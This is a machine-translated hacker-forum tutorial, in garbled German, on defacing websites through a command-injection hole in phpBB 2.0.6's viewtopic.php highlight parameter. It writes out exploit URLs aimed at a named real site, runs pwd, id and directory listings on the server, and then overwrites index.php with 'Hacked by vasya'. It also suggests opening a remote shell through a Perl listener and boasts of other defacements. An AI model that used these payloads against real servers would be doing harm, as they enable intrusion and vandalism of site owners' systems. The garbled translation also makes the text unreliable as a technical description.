This page has been robot translated, sorry for typos if any. Original content here.

Komplette Anleitung zum Deal (aktualisiert)

Einleitung
Ich sehe oft die Frage auf dem Forum: "Wie kann man die Seiten brechen?" Oder "Wie kann ich die Seite sanieren?". Heute können Sie das Portal ohne Anstrengung defekt machen! Alle Liebhaber der leichten Beute lade ich ein! =)

Hauptteil
Heute werde ich darüber reden, wie man die Unterschiede der verschiedenen Seiten durch Fehler in populären Skripten macht. Vor kurzem wurde in der populären phpBB-Engine ein ernstes Sicherheitsloch entdeckt.
Im Modul viewtopic.php wurde eine Schwachstelle erkannt

Der Punkt ist, dass ein entfernter Angreifer ein beliebiges PHP-Skript auf einem betroffenen System ausführen könnte, wenn er über eine solche Zeile viewtopic.php geht? T = 1 & highlight =% 27

Wie Sie vermutlich schon vermutet haben, erlaubt Ihnen diese Sicherheitsanfälligkeit, beliebige Befehle beliebiger Länge auf einem anfälligen Server auszuführen. Heute werden wir dieses Loch benutzen, und zusammen mit Ihnen werden wir den richtigen Server brechen. Unser Ziel ist es, ein Deface zu sein, das heißt, die Hauptseite der Seite mit unserem zu ersetzen.

Also, fangen wir an, unser Opfer wird www.maxmuscle.dk sein (zum Zeitpunkt der Veröffentlichung ist das Portal resistent gegen Anfälligkeit).
Das erste, was uns beim Betrachten dieser Seite ins Auge fällt, ist, dass es auf der Basis des Portalsystems php-nuke gebaut wird.

Standardmäßig ist phpBB das Forum in diesem System. Wir klicken auf den Link, der uns zum Forum führt (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=index.php) und stellen Sie sicher, dass dies phpBB Version 2.0.6 ist .

Wir geben die folgende Frage an das Forum:

Http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s =

Und finde, dass der Motor die Linie absorbiert hat, wie die charakteristische Inschrift anstelle des Spitznamens eines der Benutzer belegt: ") #i". Aber das bedeutet nichts, wir können die Ausführung von Befehlen auf diesem Server leicht abbrechen, aber wir werden es nicht erraten und versuchen einfach es auszuführen:

Http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s = pwd

Dieser Befehl (pwd) sollte uns das Verzeichnis zeigen, in dem wir jetzt sind, wenn dies geschieht, dann folgt daraus, dass die Ausführung von Befehlen auf dem Server möglich ist. Das ist was passiert Der Pfad des / var / www / html / osclux / Verzeichnis wird angezeigt. Der nächste Befehl ist "id", um unseren Zugang zu testen.

Wie wir die Rechte sehen, haben wir uid = 99 (niemand) , das heißt die Rechte des Webservers. Jetzt zeigen wir die Auflistung der Ordner und Dateien im Verzeichnis html_public mit dem Befehl "dir / var / www / html / osclux" an und finde, dass die index.php, die wir für das Default benötigen, in diesem Verzeichnis liegt.

Also, wir sind auf der Ziellinie - durch die Ausführung des Befehlsechos Hacked von vasya> index.php , werden wir auf der Hauptseite die Inschrift "Hacked by vasya" anzeigen. Wir überprüfen. Es stellte sich heraus.

Du hast ein Wort gemacht.

Anstatt zu schließen
Es war so einfach, dass die hackzona.ru verunstaltet wurde, so ist das Forum auf nsd.ru gebrochen. Ich stelle auch fest, dass dies die einfachste Implementierung dieses Lochs ist, unter guten Bedingungen können Sie es problemlos auf einen Server auftragen, der einen bestimmten Port, ein Skript auf einer Perle, hört und eine volle Schale mit niemandem Rechten bekommt.